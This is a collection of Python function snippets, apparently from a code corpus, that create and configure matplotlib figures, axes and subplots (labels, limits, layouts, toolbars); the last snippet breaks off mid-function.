[ "def add_subplot_axes(self, ax, rect, axis_bgcolor=None):\r\n # Modified from\r\n # https://stackoverflow.com/questions/17458580/\r\n box = ax.get_position()\r\n width, height = box.width, box.height\r\n subaxes_box = [(rect[0], rect[1]),\r\n (rect[0] + rect[2], rect[1] + rect[3])]\r\n subaxes_display_coords = ax.transData.transform(subaxes_box)\r\n trans_figure = self.figure.transFigure.inverted()\r\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\r\n x, y = subaxes_figure_coords[0, :]\r\n width, height = (subaxes_figure_coords[1, :] -\r\n subaxes_figure_coords[0, :])\r\n subaxes = self.figure.add_axes(\r\n [x, y, width, height], axis_bgcolor=axis_bgcolor)\r\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\r\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\r\n x_labelsize *= rect[2] ** 0.5\r\n y_labelsize *= rect[3] ** 0.5\r\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\r\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\r\n return subaxes", "def _InitAxes( self ):\n self.ax = self.fig.add_subplot( 111 )", "def axes_subplots():\n # gerenate data\n x = np.arange(0, 6 * np.pi+0.2, 0.2)\n y_1 = np.cos(x)\n y_2 = np.sin(2*x)\n y_3 = y_1 + y_2\n\n # display multiple\n fig, axs = plt.subplots(3, 1, sharex=True)\n fig.suptitle('Subplots w/ shared axes')\n axs[0].plot(x, y_1)\n axs[1].plot(x, y_2)\n axs[2].plot(x, y_3)\n axs[0].set_ylabel('$y$')\n axs[1].set_ylabel('$y$')\n axs[2].set_ylabel('$y$')\n\n plt.show()\n\n return None", "def setup_axes():\n\taxes = visuals.subplots(1, 2, figsize = (14, 7))\n\taxes[1].set_yscale(\"log\")\n\taxes[0].set_xlabel(\"[Fe/H]\")\n\taxes[0].set_ylabel(\"[Sr/Fe]\")\n\taxes[1].set_xlabel(\"[Sr/Fe]\")\n\taxes[1].set_ylabel(\"Stellar Probability Density\")\n\taxes[0].set_xlim([-2.2, 0.2])\n\taxes[0].set_ylim([-2.4, 0.4])\n\taxes[1].set_xlim([-1.4, 0.4])\n\taxes[1].set_ylim([0.05, 50])\n\treturn axes", "def add_subplot(gridRows, gridCols, plotNo):\n pl.subplot(gridRows, gridCols, plotNo)", "def panel_axes(self, side, **kwargs):\n return self.figure._add_axes_panel(self, side, **kwargs)", "def add_axes(self, ax):\n self._canvas.cd()\n self._axes = ax\n self._canvas.Modified()", "def setup_axes(self):\n fig = plt.figure(1)\n axs = fig.add_subplot(1, 1, 1)\n fig.clf()\n axs = plt.subplots(1, 2)\n ax1 : plt.axis = axs[0]\n ax2 : plt.axis = axs[1]\n fig.canvas.draw()\n \n line1_t, = ax1.plot([], label='train')\n line1_v, = ax1.plot([], label='val')\n\n ax1.set_title('Loss vs Iterations')\n ax1.set_xlabel('Iterations')\n ax1.set_ylabel('Loss')\n ax1.grid(True)\n ax1.autoscale()\n # ax1.legend()\n\n line2_t, = ax2.plot([], label='train')\n line2_v, = ax2.plot([], label='val')\n\n ax2.set_title('Accuracy vs Iterations')\n ax2.set_xlabel('Time')\n ax2.set_ylabel('Percent Accuracy')\n ax2.grid(True)\n ax2.autoscale()\n # ax2.legend()\n\n lines = [line1_t, line1_v, line2_t, line2_v]\n\n return fig, ax1, ax2, lines", "def plot_main(self):\n\n f, axes = plt.subplots(2, 3, figsize=(16, 8))\n self.data_plot(ax=axes[0, 0])\n self.model_plot(ax=axes[0, 1])\n self.normalized_residual_plot(ax=axes[0, 2], v_min=-6, v_max=6)\n self.source_plot(ax=axes[1, 0], convolution=False, deltaPix_source=0.01, numPix=100)\n self.convergence_plot(ax=axes[1, 1], v_max=1)\n self.magnification_plot(ax=axes[1, 2])\n f.tight_layout()\n f.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0., hspace=0.05)\n return f, axes", "def init_axes(self):\n plt.switch_backend(\"cairo\")\n fig = plt.figure(figsize=(15,10))\n ax = 
fig.add_axes([0.05, 0.15, 0.9, 0.80,])\n return (fig, ax)", "def setup_mpl_visuals(self, axes=None) -> None:\n if axes is None:\n axes = self.subplot\n axes.patch.set_facecolor('white')\n axes.set_aspect('equal', 'box')\n axes.set_xlim(-10, 10, auto=True)\n axes.set_ylim(-10, 10, auto=True)\n # TODO: Make XYLim confort to window size/dimensions\n axes.set_xticks([])\n axes.set_yticks([])\n self.figure.subplots_adjust(bottom=0, top=1, left=0, right=1)\n axes.axis('off')", "def subplots(fig_width=None, fig_height=None, *args, **kwargs):\n fig_width, fig_height = get_width_height(fig_width, fig_height, columns=2)\n fig, axes = plt.subplots(figsize=(fig_width, fig_height), *args, **kwargs)\n return fig, axes", "def set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):\n axes.set_xlabel(xlabel)\n axes.set_ylabel(ylabel)\n axes.set_xscale(xscale)\n axes.set_yscale(yscale)\n axes.set_xlim(xlim)\n axes.set_ylim(ylim)\n if legend:\n axes.legend(legend)\n axes.grid()", "def set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):\n axes.set_xlabel(xlabel)\n axes.set_ylabel(ylabel)\n axes.set_xscale(xscale)\n axes.set_yscale(yscale)\n axes.set_xlim(xlim)\n axes.set_ylim(ylim)\n if legend:\n axes.legend(legend)\n axes.grid()", "def set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):\n axes.set_xlabel(xlabel)\n axes.set_ylabel(ylabel)\n axes.set_xscale(xscale)\n axes.set_yscale(yscale)\n axes.set_xlim(xlim)\n axes.set_ylim(ylim)\n if legend:\n axes.legend(legend)\n axes.grid()", "def _setup_figure(self):\n\n plt.figure(1)\n plt.clf()\n\n # Two main axes\n self._tsne_window = plt.axes([0.05, 0.05, 0.4, 0.4])\n self._main_window = plt.axes([0.05, 0.55, 0.4, 0.4])\n\n # Nine sub axes\n self._sub_windows = []\n for row in range(3):\n for col in range(3):\n tt = plt.axes([0.5+0.17*col, 0.75-0.25*row, 0.15, 0.15])\n tt.set_xticks([])\n tt.set_yticks([])\n self._sub_windows.append(tt)\n\n # Register the button click\n self._cid = plt.figure(1).canvas.mpl_connect('button_press_event', self._onclick)\n\n # Text\n plt.figure(1).text(0.6, 0.2, 'Click with 2nd or 3rd mouse button to select image...')\n plt.figure(1).text(0.05, 0.5, 'Click in main image or tSNE plot to find similar cutouts...')\n plt.figure(1).text(0.6, 0.05, 'The tSNE data reduction calculated from data run through {}'.format(self._model_name), fontsize=8)\n\n # Show\n plt.figure(1).show()\n plt.figure(1).canvas.draw()", "def add_figure(self,sig,index,title='',xlabel='',ylabel=''):\n self.last_index = index\n ax = self.fig.add_subplot(self.position+index)\n ax.set_title(title)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.plot(sig)", "def __init__(self):\n self.fig = pl.figure(1,figsize=(8,6), dpi=80 , frameon = True , facecolor = '0.75' , edgecolor = 'w')\n self.fig.add_subplot(111 , axisbg = 'w' , projection = 'rectilinear') #if you want to add axes on particular place: fig.add_axes([0.15, 0.1, 0.7, 0.3]) where -> [begin , bottom to start axes , width , height ]\n self.separated = True #if we have a list and need to plot the plots separated", "def plot(self):\n fig, axes = plt.subplots(math.ceil(len(self.plots) / self.col_wrap), self.col_wrap)\n\n for ps, ax in zip(self.plots, axes.flatten()):\n for p in ps:\n if p.x is not None and p.y is not None:\n p.method(x=p.x, y=p.y, *p.args, ax=ax, **p.kwargs)\n else:\n p.method(*p.args, ax=ax, **p.kwargs)\n\n return fig, axes", "def populate_plot_axis(self,plot,ax='x'):\n\n fig=plt.gcf()\n\n extra_ax=[]\n\n if ax=='x':\n\n ticks=plot.get_xticks()\n\n 
lim=plot.get_xlim()\n\n for i in range(len(self.names)):\n\n if i==0:\n\n axn=plot\n\n axn.spines['bottom'].set_position(('outward',10))\n\n axn.spines['bottom'].set_visible(True)\n\n else:\n\n dy_fig=0.08\n\n prev_ax_position=axn.get_position()\n\n extra_ax.append(fig.add_axes(\\\n (prev_ax_position.x0,\\\n prev_ax_position.y0-2*dy_fig,\\\n prev_ax_position.width,\\\n 0),'autoscalex_on',True))\n\n axn=extra_ax[i-1]\n\n axn.yaxis.set_visible(False)\n\n for side in axn.spines.keys():\n\n axn.spines[side].set_linewidth(1)\n\n axn.set_xticks(ticks)\n\n ticksnames=[float(str(x)) for x in self.values[i]]\n\n axn.set_xticklabels(\\\n [\"{:.2f}\".format(x).rstrip('0').rstrip('.') for x in ticksnames],\\\n rotation = 45)\n\n xlab=axn.set_xlabel(self.names[i])\n\n xlab.set_fontsize(10)\n\n axn.tick_params(axis='x',labelsize=10)\n\n axn.set_xlim(lim)\n\n\n\n elif ax=='y':\n\n ticks=plot.get_yticks()\n\n lim=plot.get_ylim()\n\n for i in range(len(self.names)):\n\n if i==0:\n\n axn=plot\n\n axn.spines['left'].set_position(('outward',10))\n\n axn.spines['left'].set_visible(True)\n\n else:\n\n dx_fig=0.08\n\n plot_position=plot.get_position()\n\n prev_ax_position=axn.get_position()\n\n extra_ax.append(fig.add_axes(\\\n (prev_ax_position.x0-2*dx_fig,\\\n prev_ax_position.y0,\\\n 0,\\\n prev_ax_position.height),'autoscalex_on',True))\n\n axn=extra_ax[i-1]\n\n axn.xaxis.set_visible(False) # hide the yaxis\n\n for side in axn.spines.keys(): # 'top', 'bottom', 'left', 'right'\n\n axn.spines[side].set_linewidth(1)\n\n axn.set_yticks(ticks)\n\n ticksnames=[float(str(x)) for x in self.values[i]]\n\n axn.set_yticklabels(\\\n [\"{:.2f}\".format(x).rstrip('0').rstrip('.') for x in ticksnames],\\\n rotation = 45)\n\n ylab=axn.set_ylabel(self.names[i])\n\n ylab.set_fontsize(10)\n\n axn.tick_params(axis='y',labelsize=10)\n\n axn.set_ylim(lim)\n\n else:\n\n raise ValueError(\"Axis can be 'x' or 'y'\")", "def addAxes(self):\n numDims = len(self.relation.fieldNames) - 1\n angle = 360 / numDims\n axisDomains = self.relation.axisDomains\n for i in range(numDims):\n axis = PlotAxis(self)\n self.scene().addItem(axis)\n if self.axisAngles and i < len(self.axisAngles):\n axis.setRotation(self.axisAngles[i])\n else:\n axis.setRotation(angle * i)\n self.axes.append(axis)\n\n domain = axisDomains[i]\n text = PlotAxisLabel(\"{}\\n[{:.2f},{:.2f}]\".format(self.relation.fieldNames[i], domain[0], domain[1]))\n text.setFont(self.labelFont)\n self.axisLabels.append(text)\n text.setParentItem(axis)", "def createFigure(self,numSubplots,figWidth,figHeight):\r\n#\t\tif self.makeTB:\r\n#\t\t\tself.createToolbar(self.vbox)\r\n#\t\tself.vbox.pack_start(self.myTB,False,False)\r\n\t\tself.axisList=[]\r\n\t\tself.axis=None\r\n\t\t# define handles to widgets\r\n\r\n\t\t############## FIGURE\r\n\t\tself.figure = Figure(dpi=60)\t\t\r\n\t\tself.figure.set_facecolor(figBgColour)\r\n\t\tself.figure.set_edgecolor(figBgColour)\r\n\r\n\t\t#self.axis.set_title('Graph')\r\n\r\n\t\tself.canvas = FigureCanvas(self.figure)\r\n\t\tself.canvas.set_size_request(figWidth,figHeight)\r\n\t\tself.canvas.show()\r\n\t\tself.buttonCallback=self.canvas.mpl_connect('button_press_event', self.OnPress)\r\n#\t\tself.canvas.mpl_connect('resize_event', onAutoScale, None, self.axis, self.canvas)\r\n\r\n \r\n\t\t############## AXIS\r\n\t\t#self.axis=self.figure.add_axes(plotPosition,axisbg=axisColour)\r\n\t\tsubplotList=[]\r\n\t\tfor m in range(numSubplots[0]*numSubplots[1]):\r\n\t\t\tsubplotList.append(numSubplots[0]*100 + numSubplots[1] * 10 + m+1)\r\n\r\n\t\tif 
len(subplotList)==1:\r\n\t\t\tself.axisList.append(self.figure.add_subplot(111,axisbg=axisColour,polar=self.plotPolar))\r\n\t\t\tself.axisList[0].set_position(PLOT_POSITION)\r\n\t\telse:\r\n\t\t\tfor x in subplotList:\r\n\t\t\t\tself.axisList.append(self.figure.add_subplot(x,axisbg=axisColour))\r\n\r\n\t\tself.axis=self.axisList[0]\r\n\r\n\t\t# format each axis correctly\r\n\t\tfor axis in self.axisList:\r\n\t#\t\tself.axis.grid(True,which='major')\r\n\t\t\taxis.grid(True)\r\n\t#\t\tself.axis.grid(True,which='minor',color='r', linestyle='-', linewidth=2)\r\n\t#\t\tself.axis.set_position(plotPosition)\r\n\r\n\t\t\txax=axis.get_xticklabels()\r\n\t\t\tyax=axis.get_yticklabels()\r\n\r\n\t\t\tfor tick in xax:\r\n\t\t\t\ttick.set_fontsize(axisTextSize)\r\n\r\n\t\t\tfor tick in yax:\r\n\t\t\t\ttick.set_fontsize(axisTextSize)\t\t\r\n\r\n\t\t\r\n\t\tself.legendStr=[]\r\n\t\tself.gaList=[]\r\n\r\n\t\t## add cursor function to axis when mouse is over it\r\n#\t\tself.cursor = Cursor(self.axis, useblit=True, color='red', linewidth=1)\r\n\r\n\t\tself.canvas.draw()\r\n\r\n\t\t# plot a transparent rectangle just on axis 1\r\n\t\tcurrXlim=self.axis.get_xlim()\r\n\t\tdx=abs(currXlim[1]-currXlim[0])\r\n\t\tx0=currXlim[0]\r\n\t\tcurrYlim=self.axis.get_ylim()\r\n\t\tdy=abs(currYlim[1]-currYlim[0])\r\n\t\ty0=currYlim[0]\r\n\r\n\t\tself.axis.r1=plotRect(self.axis,self.canvas,(x0,y0),dx,dy,showRect=self.showRect)\r\n\r\n\t\t#self.axis.cla()\r\n\r\n\t\t\r\n\t\t############## TOOLBAR\r\n\t\t# use a custom version of the matplotlib toolbar\r\n#\t\ttoolbar = NavigationToolbar2(self.canvas, self.win)\r\n\t\tself.toolbar = PlotToolbar(self.canvas,self.win,self.axis)\r\n\t\tzoomtoolbar = PlotZoomToolbar(self.canvas,self.win,self.axis,)\r\n\r\n\t\t# make a TB menu\r\n\t\tmenuList=['|FFT|','Normalised |FFT|','|FFT| & arg(FFT)','|T| & <T','Re & Im (T)','Re & Im (1/T - 1)','n & alpha']\r\n\t\tmnuBtn = MenuToolButtonWidget(menuList, icon=gtk.STOCK_SELECT_COLOR, label='FFT')\r\n\t\tmnuBtn.btn.connect(\"clicked\",self.newFFTwin2,0)\r\n\t\tfor m in range(len(menuList)):\r\n\t\t\tmnuBtn.menuItems[m].connect(\"activate\",self.newFFTwin,m)\r\n\r\n\t\tmnuBtn.btn.set_tooltip_text('Take windowed FFT of ALL lines.')\r\n\t\tself.toolbar.add(mnuBtn.btn)\r\n\r\n\r\n\r\n\t\tsep=gtk.SeparatorToolItem()\r\n\t\tself.toolbar.insert(sep,1)\r\n\r\n\r\n\t\tbtn6=gtk.ToolButton(gtk.STOCK_CLEAR)\r\n\t\tbtn6.connect(\"clicked\",self.OnClear)\r\n\t\tbtn6.set_label('Clear')\r\n\t\tbtn6.set_tooltip_text('Clear the axis.')\r\n\t\tself.toolbar.insert(btn6,1)\r\n\r\n\t\tbtn0=gtk.ToolButton(gtk.STOCK_SAVE_AS)\r\n\t\tbtn0.connect(\"clicked\",self.OnExport)\r\n\t\tbtn0.set_label('Export')\r\n\t\tbtn0.set_tooltip_text('Export data from a curve.')\r\n\t\tself.toolbar.insert(btn0,1)\r\n\r\n\r\n\t\t# make a TB menu\r\n\t\tfitMenuList=['Linear','Polynomial','Exp decay','Subtract exp']\r\n\t\tfitmnuBtn = MenuToolButtonWidget(fitMenuList, icon=gtk.STOCK_ABOUT, label='Fit')\r\n\t\tfitmnuBtn.btn.connect(\"clicked\",self.fitPolynomial,0)\r\n\t\tfor m in range(len(fitMenuList)):\r\n\t\t\tfitmnuBtn.menuItems[m].connect(\"activate\",self.fitPolynomial,m)\r\n\r\n\t\tfitmnuBtn.btn.set_tooltip_text('Fits a polynomial to data (default is a linear fit).')\r\n\t\tself.toolbar.add(fitmnuBtn.btn)\r\n\r\n\r\n\t\tbtn7=gtk.ToolButton(gtk.STOCK_CONVERT)\r\n\t\tbtn7.connect(\"clicked\",self.getBeamWidth)\r\n\t\tbtn7.set_label('Beamwidth')\r\n\t\tbtn7.set_tooltip_text('Get the beamwidth (fits Gaussian to 
dy/dx).')\r\n\t\tself.toolbar.add(btn7)\r\n\r\n\t\tbtn8=gtk.ToolButton(gtk.STOCK_EDIT)\r\n\t\tbtn8.connect(\"clicked\",self.editPlotParams)\r\n\t\tbtn8.set_label('Axes')\r\n\t\tbtn8.set_tooltip_text('Edit plot parameters.')\r\n\t\tself.toolbar.add(btn8)\r\n\r\n\t\tbtn9=gtk.ToolButton(gtk.STOCK_PROPERTIES)\r\n\t\tbtn9.connect(\"clicked\",self.editLegend)\r\n\t\tbtn9.set_label('Legend')\r\n\t\tbtn9.set_tooltip_text('Edit legend.')\r\n\t\tself.toolbar.add(btn9)\r\n\r\n#\t\tself.toolbar.set_style(gtk.TOOLBAR_BOTH) # make toolbar icons and labels visible\r\n\r\n\t\tif self.makeTB:\r\n\t\t\tself.vbox.pack_start(self.toolbar,False,False)\r\n\r\n\t\tself.vbox.pack_start(self.canvas,True,True)\r\n\t\tself.vbox.pack_start(zoomtoolbar,False,False)\r\n\r\n\t\t####### Line selector/axis alteration toolbar\r\n\t\thbox=gtk.HBox(homogeneous=False, spacing=0)\r\n\r\n\t\tparamNames = ['Line:']\r\n\t\tparamTypes = ['cmb']\r\n\t\tparamDefaultValues = [[]]\r\n\r\n\t\tparamBox = ParamWidget(paramNames,paramTypes,paramDefaultValues)\r\n\t\tself.cmbBox = paramBox.objectList[0]\r\n#\t\tself.cmbBox.connect('changed',self.line_changed)\r\n\r\n\t\tself.hideBtn = gtk.ToggleToolButton(gtk.STOCK_NO)\r\n\t\tself.hideBtn.set_tooltip_text('Hide')\r\n\t\tself.hideBtn.connect('clicked',self.toggle_line)\r\n\t\tparamBox.table.attach(self.hideBtn,0,1,0,1,xoptions=gtk.EXPAND,yoptions=gtk.EXPAND)\r\n\t\t\r\n\t\tself.colourBtn = gtk.ToolButton(gtk.STOCK_COLOR_PICKER)\r\n\t\tself.colourBtn.set_tooltip_text('Colour')\r\n\t\tself.colourBtn.connect('clicked',self.change_colour)\r\n\t\tself.color=gtk.gdk.Color(red=0,green=0,blue=1)\r\n\r\n\t\tparamBox.table.attach(self.colourBtn,1,2,0,1,xoptions=gtk.EXPAND,yoptions=gtk.EXPAND)\r\n\t\t\r\n\t\tself.cmbStyle = gtk.combo_box_new_text()\r\n\r\n\t\tfor style in STYLES:\r\n\t\t\tself.cmbStyle.append_text(style)\r\n\t\tself.cmbStyle.set_active(0)\r\n#\t\tself.style.set_tooltip_text('Line style')\r\n\t\tself.cmbStyle.connect('changed',self.change_style)\r\n\r\n\t\tparamBox.table.attach(self.cmbStyle,2,3,0,1,xoptions=gtk.EXPAND,yoptions=gtk.EXPAND)\r\n\r\n\t\tself.removeBtn = gtk.ToolButton(gtk.STOCK_DELETE)\r\n\t\tself.removeBtn.set_tooltip_text('Remove')\r\n\t\tself.removeBtn.connect('clicked',self.remove_line)\r\n\r\n\t\tparamBox.table.attach(self.removeBtn,3,4,0,1,xoptions=gtk.EXPAND,yoptions=gtk.EXPAND)\r\n\r\n\r\n\t\thbox.pack_start(paramBox.frame,False,False)\r\n\r\n\t\tparamNames = ['Axis:','Left-click sets:']\r\n\t\tparamTypes = ['lbl','cmb']\r\n\t\tparamDefaultValues = ['',['Nothing','Window left','Window right','Axis left','Axis right','Plots point']]\r\n\r\n\t\tparamBox = ParamWidget(paramNames,paramTypes,paramDefaultValues)\r\n\t\thbox.pack_start(paramBox.frame,False,False)\r\n\t\t\r\n\t\tself.cmbBtn = paramBox.objectList[1]\r\n\t\tself.cmbBtn.set_active(0)\r\n\t\tself.cmbBtn.connect(\"changed\", self.onModeChanged)\r\n\r\n\t\thbox.show_all()\r\n\r\n#\t\tself.canvas.mpl_connect('axes_enter_event', self.enter_axes)\r\n#\t\tself.canvas.mpl_connect('axes_leave_event', self.leave_axes)\r\n\r\n\t\tif self.makeTB:\r\n#\t\t\tself.connectToolbar()\r\n\t\t\tself.vbox.pack_start(hbox,False,False)", "def add_figure1(self,x,y,index=1,title='',xlabel='',ylabel=''):\n self.last_index = index\n ax = self.fig.add_subplot(self.position+index)\n ax.set_title(title)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.plot(x,y)", "def etio_subplot(df, ax, title, graph_color='skyblue'):\n\n post_dx_histo = histo_dx_includes(df)\n hist_df = pd.DataFrame({\"Dx\": post_dx_histo.index, \"Count\": 
post_dx_histo.data})\n #hist_df = hist_df.drop(1)\n print(hist_df)\n\n graph_range = range(1,len(hist_df.index)+1)\n ax.hlines(y=graph_range, xmin=0, xmax=hist_df['Count'], color=graph_color)\n ax.plot(hist_df['Count'], graph_range, \"D\", color=graph_color)\n ax.set_yticks(range(1, len(hist_df['Dx'])+1))\n ax.set_yticklabels(hist_df['Dx'], fontsize='10')\n\n ax.set_title(title, fontsize='10')\n return ax", "def plot_axes_on_fig(ax, fig=None, geometry=(1, 1, 1)):\n if fig is None:\n fig = plt.figure()\n if ax.get_geometry() != geometry:\n ax.change_geometry(*geometry)\n axes = fig.axes.append(ax)\n return fig, axes", "def subplot_to_figure(self):\n if self.format is \"show\":\n plt.show()\n elif self.format is \"png\":\n plt.savefig(self.path + self.filename + \".png\", bbox_inches=\"tight\")", "def set_axes(self, a):\r\n self.axes = a", "def create_figure(self) -> None:\n plt.ion()\n self.fig = plt.figure(1)\n self.axis = self.fig.add_subplot(111, xlim=(0, 1), ylim=(0, 1))\n self.axis.grid(True)\n plt.xticks(np.linspace(0, 1, self._param[\"n_v\"] + 1))\n plt.yticks(np.linspace(0, 1, self._param[\"n_v\"] + 1))\n a_plt, = self.axis.plot([], [], 'bx', markersize=5)\n l_plt, = self.axis.plot([], [], 'r.', markersize=15)\n self.plots = [a_plt, l_plt]", "def __init__(self, subplot_objects):\n self.subplot_objects = subplot_objects", "def add_subplots(fig, els_counted, atts_counted, chart_info, name=\"\", log=False):\n if name != \"\":\n if is_filename(name):\n # overview of element/attribute usage for a single text\n draw_chart(els_counted, fig, chart_info[\"elements_used_text\"], log)\n draw_chart(atts_counted, fig, chart_info[\"attributes_used_text\"], log)\n elif is_attname(name):\n # overview for a specific attribute\n draw_chart(atts_counted, fig, chart_info[\"attribute_used\"], log)\n else:\n # overview for a specific element\n draw_chart(els_counted, fig, chart_info[\"element_used\"], log)\n else:\n # overall overview of element and attribute usage\n draw_chart(els_counted, fig, chart_info[\"elements_used_all\"], log)\n draw_chart(atts_counted, fig, chart_info[\"attributes_used_all\"], log)", "def ex_subplot(self, X, Y, vert = True, ttls='', argls='', **kwargs):\n go_with_x()\n ax = gca()\n\n num_subplots = len(Y)\n\n if not len(Y) > 1:\n raise Exception, \"Subplot requires at least two Y arguments\"\n\n for i in range(len(Y)):\n argl = ''\n ttl = ''\n\n # parse out list of arguments and titles\n if len(argls) == len(Y):\n argl = argls[i]\n if len(ttls) == len(Y):\n ttl = ttls[i]\n\n # based on vert setting, determine subplot command\n if vert == True:\n sub_num = int('%d%d%d' % (num_subplots, 1, i+1))\n else:\n sub_num = int('%d%d%d' % (1, num_subplots, i+1))\n\n subplot(sub_num)\n\n # If passed a list of indices, pass to twinplot function\n if hasattr(Y[i], '__iter__'):\n self.ex_twinplot(X, Y[i], ttl=ttl, argl=argl, **kwargs)\n else:\n self.ex_plot(X, Y[i], ttl=ttl, argl=argl, **kwargs)\n\n ax = gca()\n\n # Remove redundant axes on subplot\n if vert == True:\n if i+1 != len(Y):\n ax.set_xlabel('')\n else:\n if i != 0:\n ax.set_ylabel('')", "def execute(self, fig):\n info = self._params\n renderer = fig._get_renderer()\n with getattr(renderer, \"_draw_disabled\", nullcontext)():\n kwargs = get_tight_layout_figure(\n fig, fig.axes, get_subplotspec_list(fig.axes), renderer,\n pad=info['pad'], h_pad=info['h_pad'], w_pad=info['w_pad'],\n rect=info['rect'])\n if kwargs:\n fig.subplots_adjust(**kwargs)", "def __init__(self, subplot_class, *args, **kwargs):\n import pylab\n self.fig = 
pylab.figure(*args, **kwargs)\n self.subplot_class = subplot_class", "def _make_twin_axes(self, *args, **kwargs):\n # Typically, SubplotBase._make_twin_axes is called instead of this.\n # There is also an override in axes_grid1/axes_divider.py.\n if 'sharex' in kwargs and 'sharey' in kwargs:\n raise ValueError('Twinned Axes may share only one axis.')\n ax2 = self.figure.add_axes(self.get_position(True), *args, **kwargs)\n self.set_adjustable('datalim')\n ax2.set_adjustable('datalim')\n self._twinned_axes.join(self, ax2)\n return ax2", "def plot_subplots_vel(self, fig_num: int, title: str, y_label: str, vel: np.ndarray) -> matplotlib.figure.Figure:\n fig = plt.figure(fig_num)\n axs = fig.subplots(3, 1, sharex=True)\n marker_graph_init(axs, vel, y_label, self.frame_nums, color='blue')\n plt.tight_layout()\n fig.suptitle(title)\n make_interactive()\n return fig", "def adjust_axes(axes):\n # TODO: Uncomment & decide for each subplot!\n for ax in axes.itervalues():\n core.hide_axis(ax)\n\n for k in [\n \"placeholder\",\n \"placeholder1\",\n \"placeholder2\",\n \"spikes_stim\",\n \"spikes_stim1\",\n \"spikes_stim2\",\n \"spikes_post\",\n \"stimulation_schema\"\n ]:\n axes[k].set_frame_on(False)", "def bind_to_figure(ax, fig=None):\n\n if fig is not None:\n assert isinstance(fig, plt.Figure), 'argument must be a Figure'\n assert len(fig.axes) == 1, 'figure must have one and only one axes'\n new_ax = fig.axes[0]\n else:\n fig, new_ax = plt.subplots()\n\n new_ax.set_facecolor(ax.get_facecolor())\n\n for line in ax.lines:\n data = line.get_data()\n new_ax.plot(data[0], data[1], linestyle=line.get_linestyle(), color=line.get_color(),\n zorder=line.zorder, label=line.get_label())\n\n for collection in ax.collections:\n data = collection.get_offsets()\n new_ax.scatter(data[:, 0], data[:, 1], marker='s', facecolor=collection.get_facecolors(),\n edgecolor=collection.get_edgecolors(), s=collection.get_sizes(),\n zorder=line.zorder, label=collection.get_label())\n\n for text in ax.texts:\n xx, yy = text.get_position()\n new_ax.text(xx, yy, text.get_text(), family=text.get_fontfamily(),\n fontsize=text.get_fontsize(),\n color=text.get_color(), ha=text.get_horizontalalignment(),\n va=text.get_verticalalignment(), zorder=text.zorder)\n\n for image in ax.images:\n new_ax.imshow(image.get_array(), interpolation=image.get_interpolation())\n\n if ax.legend_:\n new_ax.legend()\n\n new_ax.grid(ax.get_xgridlines(), color=ax.get_xgridlines()[0].get_color(),\n alpha=ax.get_xgridlines()[0].get_alpha())\n new_ax.grid(ax.get_ygridlines(), color=ax.get_xgridlines()[0].get_color(),\n alpha=ax.get_xgridlines()[0].get_alpha())\n\n new_ax.set_xlim(ax.get_xlim())\n new_ax.set_ylim(ax.get_ylim())\n new_ax.set_xlabel(ax.get_xlabel())\n new_ax.set_ylabel(ax.get_ylabel())\n\n return fig", "def _add_axes(self, n):\n height = (self.top - self.bottom) / float(self.get_n())\n height = min(height, self.maxheight)\n width = self.right - self.left\n ax = self.figure.add_axes([self.left, self.bottom + (n - 1) * height, width, height])\n return ax", "def axes_maker(rows, cols):\n fig = plt.figure()\n current_subplot = [1] # Use list in order to modify\n def next_axes(**kwargs):\n current_subplot[0] += 1\n axes = fig.add_subplot(rows, cols, current_subplot[0] - 1, **kwargs)\n return axes\n return next_axes", "def frame():\n fig = plt.figure(figsize = (6, 3))\n\n plt.subplots_adjust(left=.15, bottom=.2, right=.95, top=.9)\n ax = fig.add_subplot(111)\n \n ax.tick_params(axis=\"x\", labelsize=12)\n ax.tick_params(axis=\"y\", labelsize=12)\n\n 
return fig, ax", "def add_subplot(self, plot, i=0, j=0, plot_id=None):\n self.plotlayout.addWidget(plot, i, j)\n self.plots.append(plot)\n if plot_id is None:\n plot_id = id(plot)\n self.manager.add_plot(plot, plot_id)", "def _set_axes(self):\n self += helper.line(stroke=\"black\", x1=self.__dict__['x'], x2=self.__dict__['x'], y1=0, y2=self.__dict__['y']*2)\n self += helper.line(stroke=\"black\", x1=0, x2=self.__dict__['x']*2, y1=self.__dict__['y'], y2=self.__dict__['y'])", "def plot_subplots(self, fig_num: int, title: str, raw: np.ndarray, smoothed: np.ndarray,\n axes_lbl_entries: Sequence[str]) -> matplotlib.figure.Figure:\n fig = plt.figure(fig_num)\n axs = fig.subplots(3, 1, sharex=True)\n raw_lines = marker_graph_init(axs, raw, '', self.frame_nums, color='red')\n for idx, ax in enumerate(axs):\n plot_utils.update_ylabel(ax, axes_lbl_entries[idx], font_size=10)\n smoothed_lines = marker_graph_add(axs, smoothed, self.frame_nums, color='green')\n plt.tight_layout()\n plt.subplots_adjust(top=0.94)\n fig.suptitle(title)\n fig.legend((raw_lines[0], smoothed_lines[0]), ('Raw', 'Smoothed'), ncol=2, handlelength=0.75,\n handletextpad=0.25, columnspacing=0.5, loc='lower left')\n make_interactive()\n return fig", "def prepare_subplot(fig, point_list, cols, rows, number, lims):\n ax = fig.add_subplot(cols, rows, number)\n ax.scatter(list(map(lambda e: e[0], point_list)), list(map(lambda e: e[1], point_list)), s=9)\n ax.set_xlim(lims[0], lims[1])\n ax.set_ylim(lims[0], lims[1])\n return ax", "def adjust_figsize(self):\n extra_width = 0\n extra_height = 0\n if 'suptitle' in self.figure_objects:\n suptitle_obj = self.figure_objects['suptitle']\n suptitle_height = self.get_bbox(suptitle_obj).height\n extra_height += suptitle_height\n\n ax_widths = []\n ax_heights = []\n for subplot in self.subplots:\n ax = subplot.ax\n annotations = subplot.annotations\n\n width = 0\n height = 0\n if annotations is not None:\n ax_bbox = self.get_bbox(ax)\n\n if 'title' in annotations:\n title_obj = annotations['title']\n title_height = self.get_bbox(title_obj).height\n height += title_height\n\n xticks_objects = ax.get_xticklabels()\n first_xtick_bbox = self.get_bbox(xticks_objects[0]) # first lower xticklabel bbox\n lower_xticks_height = max(0, ax_bbox.y0 - 